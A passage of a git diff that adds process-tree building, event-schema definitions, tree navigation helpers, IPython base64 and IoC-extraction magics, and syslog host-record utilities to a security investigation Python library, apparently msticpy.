+        + proc_data[proc_id_col].astype(str)
+        + "|"
+        + proc_data[timestamp_col].dt.round("10us").dt.strftime(TS_FMT_STRING)
+    )
+    # proc_data[key_name] = proc_data[key_name].fillna("")
+
+
+# Diagnostic/debug functions
+def _check_merge_status(procs, merged_procs, schema):
+    """Diagnostic for _merge_parent_by_time."""
+    orig_cols = [col for col in merged_procs.columns if not col.endswith("_par")]
+    rows_with_dups2 = (
+        merged_procs.dropna()
+        .groupby(orig_cols)
+        .count()
+        .reset_index()
+        .query(f"{schema.process_id}_par > 1")[Col.source_index]
+    )
+
+    # Check status
+    print("Original # procs", len(procs))
+    print("Merged # procs", len(merged_procs))
+    print("Merged # procs - dropna", len(merged_procs.dropna()))
+
+    print(
+        "Unique merged_procs index in merge",
+        len(merged_procs[Col.source_index].unique()),
+    )
+    print("These two should add up to top line")
+    row_dups = len(rows_with_dups2)
+    print("Rows with dups", row_dups)
+    row_nodups = len(
+        merged_procs[~merged_procs[Col.source_index].isin(rows_with_dups2)]
+    )
+    print("Rows with no dups", row_nodups)
+    print(row_dups, "+", row_nodups, "=", row_dups + row_nodups)
+
+
+def _check_inferred_parents(procs, procs_par):
+    """Diagnostic for _extract_inferred_parents."""
+    print(
+        "original:",
+        len(procs),
+        "inferred_parents",
+        len(procs_par) - len(procs),
+        "combined",
+        len(procs_par),
+    )
+
+
+def _check_proc_keys(merged_procs_par, schema):
+    """Diagnostic for _assign_proc_keys."""
+    crit1 = merged_procs_par[Col.timestamp_orig_par].isin(
+        merged_procs_par[schema.time_stamp]
+    )
+    crit2 = merged_procs_par[Col.EffectiveLogonId].isin(
+        merged_procs_par[schema.logon_id]
+    )
+    c2a = None
+    if schema.target_logon_id:
+        c2a = merged_procs_par[Col.EffectiveLogonId].isin(
+            merged_procs_par[schema.target_logon_id]
+        )
+    crit3 = merged_procs_par[Col.parent_proc_lc].isin(
+        merged_procs_par[Col.new_process_lc]
+    )
+    crit4 = merged_procs_par[schema.process_id].isin(merged_procs_par[schema.parent_id])
+    crit5 = merged_procs_par[Col.parent_key].isin(merged_procs_par.index)
+    crit6 = merged_procs_par[Col.parent_key].isna()
+    print("has parent time", len(merged_procs_par[crit1]))
+    print("effectivelogonId in subjectlogonId", len(merged_procs_par[crit2]))
+    if schema.target_logon_id and c2a is not None:
+        print("effectivelogonId in targetlogonId", len(merged_procs_par[c2a]))
+    print("parent_proc_lc in procs", len(merged_procs_par[crit3]))
+    print("ProcessId in ParentProcessId", len(merged_procs_par[crit4]))
+    print("Parent_key in proc_key", len(merged_procs_par[crit5]))
+    print("Parent_key not in proc_key", len(merged_procs_par[~crit5]))
+    print("Parent_key is NA", len(merged_procs_par[crit6]))
diff --git a/msticpy/sectools/proc_tree_builder.py b/msticpy/sectools/proc_tree_builder.py
new file mode 100644
index 000000000..3d4b70275
--- /dev/null
+++ b/msticpy/sectools/proc_tree_builder.py
@@ -0,0 +1,200 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Process Tree Builder module for Process Tree Visualization."""
+from typing import Any, Dict, Optional, Union
+
+import pandas as pd
+
+from .._version import VERSION
+from . import proc_tree_build_mde as mde
+from . import proc_tree_build_winlx as winlx
+
+# pylint: disable=unused-import
+from .proc_tree_schema import (  # noqa: F401
+    LX_EVENT_SCH,
+    MDE_EVENT_SCH,
+    MDE_INT_EVENT_SCH,
+    SUPPORTED_SCHEMAS,
+    WIN_EVENT_SCH,
+    SYSMON_PROCESS_CREATE_EVENT_SCH,
+    ProcSchema,
+)
+from .proc_tree_schema import ColNames as Col
+from .process_tree_utils import get_summary_info
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+def build_process_tree(
+    procs: pd.DataFrame,
+    schema: Union[ProcSchema, Dict[str, Any]] = None,
+    show_summary: bool = False,
+    debug: bool = False,
+) -> pd.DataFrame:
+    """
+    Build process trees from the process events.
+
+    Parameters
+    ----------
+    procs : pd.DataFrame
+        Process events (Windows 4688 or Linux Auditd)
+    schema : Union[ProcSchema, Dict[str, Any]], optional
+        The column schema to use, by default None.
+        If supplied as a dict it must include definitions for the
+        required fields in the ProcSchema class
+        If None, then the schema is inferred
+    show_summary : bool
+        Shows summary of the built tree, default is False.
+    debug : bool
+        If True produces extra debugging output,
+        by default False
+
+    Returns
+    -------
+    pd.DataFrame
+        Process tree dataframe.
+
+    See Also
+    --------
+    ProcSchema
+
+    """
+    # If schema is none, infer schema from columns
+    if not schema or schema == MDE_INT_EVENT_SCH:
+        # Special case for MDE - since there are two possible schemas
+        schema = infer_schema(procs)
+    if isinstance(schema, dict):
+        schema = ProcSchema(**schema)
+
+    if not schema:
+        raise TypeError(
+            "No matching schema for input data found.",
+            "Please create a schema definition for the process data and",
+            "pass it as the 'schema' parameter to this function.",
+        )
+
+    if schema == MDE_EVENT_SCH:
+        procs = mde.convert_mde_schema_to_internal(procs, schema=MDE_EVENT_SCH)
+        schema = MDE_INT_EVENT_SCH
+    if schema == MDE_INT_EVENT_SCH:
+        extr_proc_tree = mde.extract_process_tree(procs, debug=debug)
+    else:
+        extr_proc_tree = winlx.extract_process_tree(procs, schema=schema, debug=debug)
+    merged_procs_keys = _add_tree_properties(extr_proc_tree)
+
+    # Build process paths
+    proc_tree = build_proc_tree(merged_procs_keys)
+
+    if show_summary:
+        print(get_summary_info(proc_tree))
+    return proc_tree
+
+
+def infer_schema(data: Union[pd.DataFrame, pd.Series]) -> Optional[ProcSchema]:
+    """
+    Infer the correct schema to use for this data set.
+
+    Parameters
+    ----------
+    data : Union[pd.DataFrame, pd.Series]
+        Data set to test
+
+    Returns
+    -------
+    ProcSchema
+        The schema most closely matching the data set.
+
+    """
+    src_cols = data.columns if isinstance(data, pd.DataFrame) else data.index
+    schema_matches = {}
+    for schema in SUPPORTED_SCHEMAS:
+        matching_cols = set(src_cols) & set(schema.columns)
+        schema_matches[len(matching_cols)] = schema
+    if max(schema_matches) > 5:
+        return schema_matches[max(schema_matches)]
+    return None
+
+
+def _add_tree_properties(proc_tree):
+    """Add root, branch, leaf properties and set proc_key as index."""
+    proc_tree = proc_tree.copy()
+    # Create labels based on node type
+    ppids = proc_tree[[Col.parent_key]].set_index(Col.parent_key)
+    proc_tree = proc_tree.assign(IsRoot=False, IsLeaf=False, IsBranch=False)
+
+    is_root = proc_tree[Col.parent_key].isna()
+    has_child = proc_tree[Col.proc_key].isin(ppids.index)
+    proc_tree.loc[is_root, "IsRoot"] = True
+    proc_tree.loc[~has_child, "IsLeaf"] = True
+    proc_tree.loc[~is_root & has_child, "IsBranch"] = True
+
+    # Save the current numeric index as "source_index" converting to string
+    proc_tree[Col.source_index] = proc_tree.index.astype(str)
+    # Set the index of the output frame to be the proc_key
+    proc_tree = proc_tree.set_index(Col.proc_key)
+
+    first_unique = proc_tree.index.duplicated()
+    proc_tree = proc_tree[~first_unique]
+    return proc_tree
+
+
+def build_proc_tree(input_tree: pd.DataFrame, max_depth: int = -1) -> pd.DataFrame:
+    """
+    Build process tree paths.
+
+    Parameters
+    ----------
+    input_tree : pd.DataFrame
+        DataFrame containing process and parent key definitions
+    max_depth : int, optional
+        Maximum depth to process the tree, by default -1 (no limit)
+
+    Returns
+    -------
+    pd.DataFrame
+        DataFrame with ordered paths for each process.
+
+    """
+    # set default path == current process ID
+    input_tree["path"] = input_tree[Col.source_index]
+    # input_tree["parent_index"] = np.nan
+
+    cur_level = input_tree[input_tree["IsRoot"]]
+    remaining_procs = input_tree[~input_tree["IsRoot"]]
+
+    cur_level_num = 0
+    while True:
+        sel_crit = remaining_procs[Col.parent_key].isin(cur_level.index)
+        next_level = remaining_procs[sel_crit].copy()
+        remaining_procs = remaining_procs[~sel_crit]
+
+        if next_level.empty:
+            break
+        if max_depth != -1 and cur_level_num >= max_depth:
+            print(f"max path depth reached: {cur_level_num}")
+            break
+
+        # merge next level with current level
+        tmp_df = next_level.merge(
+            cur_level[[Col.source_index, "path"]],
+            how="inner",
+            left_on=Col.parent_key,
+            right_index=True,
+        )
+
+        # Build the path of these processes
+        # = parent_path + child source_index
+        next_level.loc[tmp_df.index, "path"] = (
+            tmp_df["path_y"] + "/" + tmp_df["source_index_x"]
+        )
+        input_tree.loc[next_level.index, "path"] = next_level["path"]
+        input_tree.loc[tmp_df.index, "parent_index"] = tmp_df["source_index_y"]
+
+        cur_level = next_level
+        cur_level_num += 1
+
+    return input_tree.copy()
diff --git a/msticpy/sectools/proc_tree_schema.py b/msticpy/sectools/proc_tree_schema.py
new file mode 100644
index 000000000..de96be2bc
--- /dev/null
+++ b/msticpy/sectools/proc_tree_schema.py
@@ -0,0 +1,255 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Process Tree Schema module for Process Tree Visualization."""
+from typing import Any, Dict, Optional
+
+import attr
+import pandas as pd
+
+from .._version import VERSION
+from ..common.exceptions import MsticpyUserError
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+class ProcessTreeSchemaException(MsticpyUserError):
+    """Custom exception for Process Tree schema."""
+
+    DEF_HELP_URI = (
+        "MSTICPy Process Tree documentation",
+        "https://msticpy.readthedocs.io/en/latest/visualization/ProcessTree.html",
+    )
+
+
+@attr.s(auto_attribs=True)
+class ProcSchema:
+    """
+    Property name lookup for Process event schema.
+
+    Each property maps a generic column name on to the
+    schema of the input data. Most of these are mandatory,
+    some are optional - not supplying them may result in
+    a less complete tree.
+    The `time_stamp` column should be supplied although
+    defaults to 'TimeGenerated'.
+
+    """
+
+    process_name: str
+    process_id: str
+    parent_id: str
+    logon_id: str
+    cmd_line: str
+    user_name: str
+    path_separator: str
+    host_name_column: str
+    time_stamp: str = "TimeGenerated"
+    parent_name: Optional[str] = None
+    target_logon_id: Optional[str] = None
+    user_id: Optional[str] = None
+    event_id_column: Optional[str] = None
+    event_id_identifier: Optional[Any] = None
+
+    def __eq__(self, other):
+        """Return False if any non-blank field values are unequal."""
+        if not isinstance(other, ProcSchema):
+            return False
+        self_dict = attr.asdict(self)
+
+        return not any(
+            value and value != self_dict[field]
+            for field, value in attr.asdict(other).items()
+        )
+
+    @property
+    def required_columns(self):
+        """Return columns required for Init."""
+        return [
+            "process_name",
+            "process_id",
+            "parent_id",
+            "logon_id",
+            "cmd_line",
+            "user_name",
+            "path_separator",
+            "host_name_column",
+            "time_stamp",
+        ]
+
+    @property
+    def column_map(self) -> Dict[str, str]:
+        """Return a dictionary that maps fields to schema names."""
+        return {
+            prop: str(col)
+            for prop, col in attr.asdict(self).items()
+            if prop not in {"path_separator", "event_id_identifier"}
+        }
+
+    @property
+    def columns(self):
+        """Return list of columns in schema data source."""
+        return [
+            col
+            for prop, col in attr.asdict(self).items()
+            if prop not in {"path_separator", "event_id_identifier"}
+        ]
+
+    def get_df_cols(self, data: pd.DataFrame):
+        """Return the subset of columns that are present in `data`."""
+        return [col for col in self.columns if col in data.columns]
+
+    @property
+    def event_type_col(self) -> str:
+        """
+        Return the column name containing the event identifier.
+
+        Returns
+        -------
+        str
+            The name of the event ID column.
+
+        Raises
+        ------
+        ProcessTreeSchemaException
+            If the schema is not known.
+
+        """
+        if self.event_id_column:
+            return self.event_id_column
+        raise ProcessTreeSchemaException(
+            "Unknown schema - there is no value for the 'event_id' column."
+        )
+
+    @property
+    def event_filter(self) -> Any:
+        """
+        Return the event type/ID to process for the current schema.
+
+        Returns
+        -------
+        Any
+            The value of the event ID to process.
+
+        Raises
+        ------
+        ProcessTreeSchemaException
+            If the schema is not known.
+
+        """
+        if self.event_id_identifier:
+            return self.event_id_identifier
+        raise ProcessTreeSchemaException(
+            "Unknown schema - there is no value for the 'event_id_identifier' in the schema."
+        )
+
+
+WIN_EVENT_SCH = ProcSchema(
+    time_stamp="TimeGenerated",
+    process_name="NewProcessName",
+    process_id="NewProcessId",
+    parent_name="ParentProcessName",
+    parent_id="ProcessId",
+    logon_id="SubjectLogonId",
+    target_logon_id="TargetLogonId",
+    cmd_line="CommandLine",
+    user_name="SubjectUserName",
+    path_separator="\\",
+    user_id="SubjectUserSid",
+    event_id_column="EventID",
+    event_id_identifier=4688,
+    host_name_column="Computer",
+)
+
+LX_EVENT_SCH = ProcSchema(
+    time_stamp="TimeGenerated",
+    process_name="exe",
+    process_id="pid",
+    parent_name=None,
+    parent_id="ppid",
+    logon_id="ses",
+    target_logon_id=None,
+    cmd_line="cmdline",
+    user_name="acct",
+    path_separator="/",
+    user_id="uid",
+    event_id_column="EventType",
+    event_id_identifier="SYSCALL_EXECVE",
+    host_name_column="Computer",
+)
+
+MDE_INT_EVENT_SCH = ProcSchema(
+    time_stamp="CreatedProcessCreationTime",
+    process_name="CreatedProcessName",
+    process_id="CreatedProcessId",
+    parent_name="ParentProcessName",
+    parent_id="CreatedProcessParentId",
+    logon_id="InitiatingProcessLogonId",
+    target_logon_id="LogonId",
+    cmd_line="CreatedProcessCommandLine",
+    user_name="CreatedProcessAccountName",
+    path_separator="\\",
+    user_id="CreatedProcessAccountSid",
+    host_name_column="ComputerDnsName",
+)
+
+# MDE Public and Sentinel DeviceProcessEvents schema
+MDE_EVENT_SCH = ProcSchema(
+    time_stamp="Timestamp",
+    process_name="FileName",
+    process_id="ProcessId",
+    parent_name="InitiatingProcessFileName",
+    parent_id="InitiatingProcessParentId",
+    logon_id="InitiatingProcessLogonId",
+    target_logon_id="LogonId",
+    cmd_line="ProcessCommandLine",
+    user_name="AccountName",
+    path_separator="\\",
+    user_id="AccountSid",
+    host_name_column="DeviceName",
+    event_id_column="ActionType",
+    event_id_identifier="ProcessCreated",
+)
+
+# Sysmon Process Create
+SYSMON_PROCESS_CREATE_EVENT_SCH = ProcSchema(
+    time_stamp="UtcTime",
+    process_name="Image",
+    process_id="ProcessId",
+    parent_name="ParentImage",
+    parent_id="ParentProcessId",
+    logon_id="LogonId",
+    cmd_line="CommandLine",
+    user_name="User",
+    path_separator="\\",
+    event_id_column="EventID",
+    event_id_identifier=1,
+    host_name_column="Computer",
+)
+
+SUPPORTED_SCHEMAS = (
+    WIN_EVENT_SCH,
+    LX_EVENT_SCH,
+    MDE_INT_EVENT_SCH,
+    MDE_EVENT_SCH,
+    SYSMON_PROCESS_CREATE_EVENT_SCH,
+)
+
+
+# pylint: disable=too-few-public-methods
+class ColNames:
+    """Class to hold constant column names."""
+
+    proc_key = "proc_key"
+    parent_key = "parent_key"
+    new_process_lc = "new_process_lc"
+    parent_proc_lc = "parent_proc_lc"
+    timestamp_orig_par = "timestamp_orig_par"
+    EffectiveLogonId = "EffectiveLogonId"
+    source_index = "source_index"
+    source_index_par = "source_index_par"
+    new_process_lc_par = "new_process_lc_par"
+    EffectiveLogonId_par = "EffectiveLogonId_par"
diff --git a/msticpy/sectools/process_tree_utils.py b/msticpy/sectools/process_tree_utils.py
new file mode 100644
index 000000000..f93f5a519
--- /dev/null
+++ b/msticpy/sectools/process_tree_utils.py
@@ -0,0 +1,363 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Process Tree Visualization."""
+from typing import Any, Dict, Optional, Union
+
+import pandas as pd
+
+from .._version import VERSION
+from .proc_tree_schema import ColNames as Col
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+def get_process_key(procs: pd.DataFrame, source_index: int) -> str:
+    """
+    Return the process key of the process given its source_index.
+
+    Parameters
+    ----------
+    procs : pd.DataFrame
+        Process events
+    source_index : int, optional
+        source_index of the process record
+
+    Returns
+    -------
+    str
+        The process key of the process.
+
+    """
+    return procs[procs[Col.source_index] == source_index].iloc[0].name
+
+
+# def build_process_key(  # type: ignore  # noqa: F821
+#     source_proc: pd.Series,
+#     schema: "ProcSchema"
+# ) -> str:
+#     """
+#     Return a process key from a process event.
+
+#     Parameters
+#     ----------
+#     source_proc : pd.Series, optional
+#         Source process
+#     schema : ProcSchema, optional
+#         The data schema to use, by default None
+#         - if None the schema will be inferred
+
+#     Returns
+#     -------
+#     str
+#         Process key of the process
+
+#     """
+#     if schema is None:
+#         schema = infer_schema(source_proc)
+#     proc_path = source_proc[schema.process_name].lower()
+#     pid = source_proc[schema.process_id]
+#     tstamp = pd.to_datetime(source_proc[schema.time_stamp]).strftime(TS_FMT_STRING)
+#     return f"{proc_path}{pid}{tstamp}"
+
+
+def get_roots(procs: pd.DataFrame) -> pd.DataFrame:
+    """
+    Return the process tree roots for the current data set.
+
+    Parameters
+    ----------
+    procs : pd.DataFrame
+        Process events (with process tree metadata)
+
+    Returns
+    -------
+    pd.DataFrame
+        Process Tree root processes
+
+    """
+    return procs[procs["IsRoot"]]
+
+
+def get_process(procs: pd.DataFrame, source: Union[str, pd.Series]) -> pd.Series:
+    """
+    Return the process event as a Series.
+
+    Parameters
+    ----------
+    procs : pd.DataFrame
+        Process events (with process tree metadata)
+    source : Union[str, pd.Series]
+        source_index of process or the process row
+
+    Returns
+    -------
+    pd.Series
+        Process row
+
+    Raises
+    ------
+    ValueError
+        If unknown type is supplied as `source`
+
+    """
+    if isinstance(source, str):
+        return procs.loc[source]
+    if isinstance(source, pd.Series):
+        return source
+    raise ValueError("Unknown type for source parameter.")
+
+
+def get_parent(
+    procs: pd.DataFrame, source: Union[str, pd.Series]
+) -> Optional[pd.Series]:
+    """
+    Return the parent of the source process.
+
+    Parameters
+    ----------
+    procs : pd.DataFrame
+        Process events (with process tree metadata)
+    source : Union[str, pd.Series]
+        source_index of process or the process row
+
+    Returns
+    -------
+    Optional[pd.Series]
+        Parent Process row or None if no parent was found.
+
+    """
+    proc = get_process(procs, source)
+    if proc.parent_key in procs.index:
+        return procs.loc[proc.parent_key]
+    return None
+
+
+def get_root(procs: pd.DataFrame, source: Union[str, pd.Series]) -> pd.Series:
+    """
+    Return the root process for the source process.
+
+    Parameters
+    ----------
+    procs : pd.DataFrame
+        Process events (with process tree metadata)
+    source : Union[str, pd.Series]
+        source_index of process or the process row
+
+    Returns
+    -------
+    pd.Series
+        Root process
+
+    """
+    proc = get_process(procs, source)
+    p_path = proc.path.split("/")
+    root_proc = procs[procs[Col.source_index] == p_path[0]]
+    return root_proc.iloc[0]
+
+
+def get_root_tree(procs: pd.DataFrame, source: Union[str, pd.Series]) -> pd.DataFrame:
+    """
+    Return the process tree to which the source process belongs.
+
+    Parameters
+    ----------
+    procs : pd.DataFrame
+        Process events (with process tree metadata)
+    source : Union[str, pd.Series]
+        source_index of process or the process row
+
+    Returns
+    -------
+    pd.DataFrame
+        Process Tree
+
+    """
+    proc = get_process(procs, source)
+    p_path = proc.path.split("/")
+    return procs[procs["path"].str.startswith(p_path[0])]
+
+
+def get_tree_depth(procs: pd.DataFrame) -> int:
+    """
+    Return the depth of the process tree.
+
+    Parameters
+    ----------
+    procs : pd.DataFrame
+        Process events (with process tree metadata)
+
+    Returns
+    -------
+    int
+        Tree depth
+
+    """
+    return procs["path"].str.count("/").max() + 1
+
+
+def get_children(
+    procs: pd.DataFrame, source: Union[str, pd.Series], include_source: bool = True
+) -> pd.DataFrame:
+    """
+    Return the child processes for the source process.
+
+    Parameters
+    ----------
+    procs : pd.DataFrame
+        Process events (with process tree metadata)
+    source : Union[str, pd.Series]
+        source_index of process or the process row
+    include_source : bool, optional
+        If True include the source process in the results, by default True
+
+    Returns
+    -------
+    pd.DataFrame
+        Child processes
+
+    """
+    proc = get_process(procs, source)
+    children = procs[procs[Col.parent_key] == proc.name]
+    if include_source:
+        return children.append(proc)
+    return children
+
+
+def get_descendents(
+    procs: pd.DataFrame,
+    source: Union[str, pd.Series],
+    include_source: bool = True,
+    max_levels: int = -1,
+) -> pd.DataFrame:
+    """
+    Return the descendents of the source process.
+
+    Parameters
+    ----------
+    procs : pd.DataFrame
+        Process events (with process tree metadata)
+    source : Union[str, pd.Series]
+        source_index of process or the process row
+    include_source : bool, optional
+        Include the source process in the results, by default True
+    max_levels : int, optional
+        Maximum number of levels to descend, by default -1 (all levels)
+
+    Returns
+    -------
+    pd.DataFrame
+        Descendent processes
+
+    """
+    proc = get_process(procs, source)
+    descendents = []
+    parent_keys = [proc.name]
+    level = 0
+    rem_procs: Optional[pd.DataFrame] = None
+    while max_levels == -1 or level < max_levels:
+        if rem_procs is not None:
+            # pylint: disable=unsubscriptable-object
+            children = rem_procs[rem_procs[Col.parent_key].isin(parent_keys)]
+            rem_procs = rem_procs[~rem_procs[Col.parent_key].isin(parent_keys)]
+            # pylint: enable=unsubscriptable-object
+        else:
+            children = procs[procs[Col.parent_key].isin(parent_keys)]
+            rem_procs = procs[~procs[Col.parent_key].isin(parent_keys)]
+        if children.empty:
+            break
+        descendents.append(children)
+        parent_keys = children.index
+        level += 1
+
+    if descendents:
+        desc_procs = pd.concat(descendents)
+    else:
+        desc_procs = pd.DataFrame(columns=proc.index, index=None)
+        desc_procs.index.name = Col.proc_key
+    if include_source:
+        return desc_procs.append(proc).sort_values("path")
+    return desc_procs.sort_values("path")
+
+
+def get_ancestors(procs: pd.DataFrame, source, include_source=True) -> pd.DataFrame:
+    """
+    Return the ancestor processes of the source process.
+
+    Parameters
+    ----------
+    procs : pd.DataFrame
+        Process events (with process tree metadata)
+    source : Union[str, pd.Series]
+        source_index of process or the process row
+    include_source : bool, optional
+        Include the source process in the results, by default True
+
+    Returns
+    -------
+    pd.DataFrame
+        Ancestor processes
+
+    """
+    proc = get_process(procs, source)
+    p_path = proc.path.split("/")
+    if not include_source:
+        p_path.remove(proc.source_index)
+    return procs[procs[Col.source_index].isin(p_path)].sort_values("path")
+
+
+def get_siblings(
+    procs: pd.DataFrame, source: Union[str, pd.Series], include_source: bool = True
+) -> pd.DataFrame:
+    """
+    Return the processes that share the parent of the source process.
+
+    Parameters
+    ----------
+    procs : pd.DataFrame
+        Process events (with process tree metadata)
+    source : Union[str, pd.Series]
+        source_index of process or the process row
+    include_source : bool, optional
+        Include the source process in the results, by default True
+
+    Returns
+    -------
+    pd.DataFrame
+        Sibling processes.
+
+    """
+    parent = get_parent(procs, source)
+    proc = get_process(procs, source)
+    siblings = get_children(procs, parent, include_source=False)
+    if not include_source:
+        return siblings[siblings.index != proc.name]
+    return siblings
+
+
+def get_summary_info(procs: pd.DataFrame) -> Dict[str, int]:
+    """
+    Return summary information about the process trees.
+
+    Parameters
+    ----------
+    procs : pd.DataFrame
+        Process events (with process tree metadata)
+
+    Returns
+    -------
+    Dict[str, int]
+        Summary statistic about the process tree
+
+    """
+    summary: Dict[str, Any] = {}
+    summary["Processes"] = len(procs)
+    summary["RootProcesses"] = len(procs[procs["IsRoot"]])
+    summary["LeafProcesses"] = len(procs[procs["IsLeaf"]])
+    summary["BranchProcesses"] = len(procs[procs["IsBranch"]])
+    summary["IsolatedProcesses"] = len(procs[(procs["IsRoot"]) & (procs["IsLeaf"])])
+    summary["LargestTreeDepth"] = procs["path"].str.count("/").max() + 1
+    return summary
diff --git a/msticpy/sectools/sectools_magics.py b/msticpy/sectools/sectools_magics.py
new file mode 100644
index 000000000..1773efe8b
--- /dev/null
+++ b/msticpy/sectools/sectools_magics.py
@@ -0,0 +1,155 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""msticpy IPython magics."""
+import re
+from typing import Tuple, List
+
+# pylint: disable=unused-import
+# flake8: noqa: F403
+import pandas as pd
+
+# pylint: enable=unused-import
+from IPython import get_ipython
+from IPython.core import magic_arguments
+from IPython.core.magic import line_cell_magic, Magics, magics_class
+
+try:
+    from bs4 import BeautifulSoup
+
+    _BS_AVAILABLE = True
+except ImportError:
+    _BS_AVAILABLE = False
+
+from . import base64unpack as base64
+from .iocextract import IoCExtract
+
+from .._version import VERSION
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+@magics_class
+class Base64Magic(Magics):
+    """Base64 IPython magic extension."""
+
+    _STRIP_TAGS = r"</?decoded[^>]*>"
+
+    @line_cell_magic
+    @magic_arguments.magic_arguments()
+    @magic_arguments.argument(
+        "--out", "-o", help="The variable to return the results in"
+    )
+    @magic_arguments.argument(
+        "--pretty", "-p", help="Print formatted version of output", action="store_true"
+    )
+    @magic_arguments.argument(
+        "--clean",
+        "-c",
+        help="Print decoded string with no formatting",
+        action="store_true",
+    )
+    def b64(self, line: str = "", cell: str = None) -> str:
+        """
+        Base64 IPython magic extension.
+
+        Parameters
+        ----------
+        line : str, optional
+            Line contents, by default ""
+        cell : str, optional
+            Cell contents, by default None
+
+        Returns
+        -------
+        str
+            Decoded text
+
+        """
+        if cell is None:
+            results, df_results = base64.unpack(line)
+
+        else:
+            results, df_results = base64.unpack(cell)
+        args = magic_arguments.parse_argstring(self.b64, line)
+
+        if args.clean:
+            results = re.sub(self._STRIP_TAGS, "", results)
+        elif args.pretty:
+            if _BS_AVAILABLE:
+                xml_str = f"<decoded_string>{results}</decoded_string>"
+                b_soup = BeautifulSoup(xml_str, "xml")
+                results = b_soup.prettify()
+        if args.out is not None:
+            self.shell.user_ns[args.out] = (results, df_results)
+        return results
+
+
+@magics_class
+class IoCExtractMagic(Magics):
+    """Ioc Extract IPython magic extension."""
+
+    def __init__(self, shell):
+        """
+        Instantiate magic class.
+
+        Parameters
+        ----------
+        shell : IPython shell
+            IPython shell
+
+        """
+        # You must call the parent constructor
+        super().__init__(shell)
+        self._ioc_extract = IoCExtract()
+
+    @line_cell_magic
+    @magic_arguments.magic_arguments()
+    @magic_arguments.argument(
+        "--out", "-o", help="The variable to return the results in"
+    )
+    @magic_arguments.argument(
+        "--ioc_types",
+        "-i",
+        help="The types of IoC to search for (comma-separated string)",
+    )
+    def ioc(self, line="", cell=None) -> List[Tuple[str, List[str]]]:
+        """
+        Ioc Extract IPython magic extension.
+
+        Parameters
+        ----------
+        line : str, optional
+            Line contents, by default ""
+        cell : str, optional
+            Cell contents, by default None
+
+        Returns
+        -------
+        List[Tuple[str, List[str]]]
+            List of tuples of IoCs found grouped by type.
+
+        """
+        args = magic_arguments.parse_argstring(self.ioc, line)
+        ioc_types = None
+        if args.ioc_types:
+            ioc_types = [ioc_type.strip() for ioc_type in args.ioc_types.split(",")]
+
+        if cell is None:
+            results = self._ioc_extract.extract(src=line, ioc_types=ioc_types)
+        else:
+            results = self._ioc_extract.extract(src=cell, ioc_types=ioc_types)
+        iocs = [(ioc_type, list(ioc_res)) for ioc_type, ioc_res in results.items()]
+
+        if args.out is not None:
+            self.shell.user_ns[args.out] = results
+        return iocs
+
+
+IPYTHON = get_ipython()
+if IPYTHON:
+    IPYTHON.register_magics(Base64Magic)
+    IPYTHON.register_magics(IoCExtractMagic)
diff --git a/msticpy/sectools/syslog_utils.py b/msticpy/sectools/syslog_utils.py
new file mode 100644
index 000000000..88c8f928d
--- /dev/null
+++ b/msticpy/sectools/syslog_utils.py
@@ -0,0 +1,282 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""
+syslog_utils - Syslog parsing and utility module.
+
+Functions required to correct collect, parse and visualize syslog data.
+
+Designed to support standard linux syslog for investigations where
+auditd is not available.
+
+"""
+import datetime as dt
+from typing import Any, Dict
+
+import ipywidgets as widgets
+import pandas as pd
+import pytz
+
+from .._version import VERSION
+from ..common.exceptions import MsticpyException
+from ..common.utility import export
+from ..datamodel.entities import GeoLocation, Host, IpAddress
+from .ip_utils import convert_to_ip_entities
+
+__version__ = VERSION
+__author__ = "Pete Bryan"
+
+_DETECTIONS_DEF_DIR = "resources"
+
+WIDGET_DEFAULTS = {
+    "layout": widgets.Layout(width="95%"),
+    "style": {"description_width": "initial"},
+}
+
+
+@export
+def create_host_record(
+    syslog_df: pd.DataFrame, heartbeat_df: pd.DataFrame, az_net_df: pd.DataFrame = None
+) -> Host:
+    """
+    Generate host_entity record for selected computer.
+
+    Parameters
+    ----------
+    syslog_df : pd.DataFrame
+        A dataframe of all syslog events for the host in the time window requried
+    heartbeat_df : pd.DataFrame
+        A dataframe of heartbeat data for the host
+    az_net_df : pd.DataFrame
+        Option dataframe of Azure network data for the host
+
+    Returns
+    -------
+    Host
+        Details of the host data collected
+
+    """
+    host_entity = Host(src_event=syslog_df.iloc[0])
+    # Produce list of processes on the host that are not
+    # part of a 'standard' linux distro
+    _apps = syslog_df["ProcessName"].unique().tolist()
+    applications = [
+        app
+        for app in _apps
+        if app
+        not in (
+            "CRON",
+            "sudo",
+            "snapd",
+            "systemd-resolved",
+            "systemd",
+            "crontab",
+            "systemd-timesyncd",
+            "systemd-logind",
+            "rsyslogd",
+            "syslog-ng",
+        )
+    ]
+
+    # Produce host_entity record mapping linux heartbeat elements to host_entity fields
+    if heartbeat_df is not None and not heartbeat_df.empty:
+        host_hb = heartbeat_df.iloc[0]
+        host_entity.SourceComputerId = host_hb["SourceComputerId"]  # type: ignore
+        host_entity.OSType = host_hb["OSType"]  # type: ignore
+        host_entity.OSName = host_hb["OSName"]  # type: ignore
+        host_entity.OSVMajorersion = host_hb["OSMajorVersion"]  # type: ignore
+        host_entity.OSVMinorVersion = host_hb["OSMinorVersion"]  # type: ignore
+        host_entity.ComputerEnvironment = host_hb["ComputerEnvironment"]  # type: ignore
+        host_entity.OmsSolutions = [  # type: ignore
+            sol.strip() for sol in host_hb["Solutions"].split(",")
+        ]  # type: ignore
+        host_entity.Applications = applications  # type: ignore
+        host_entity.VMUUID = host_hb["VMUUID"]  # type: ignore
+        ip_entity = IpAddress()
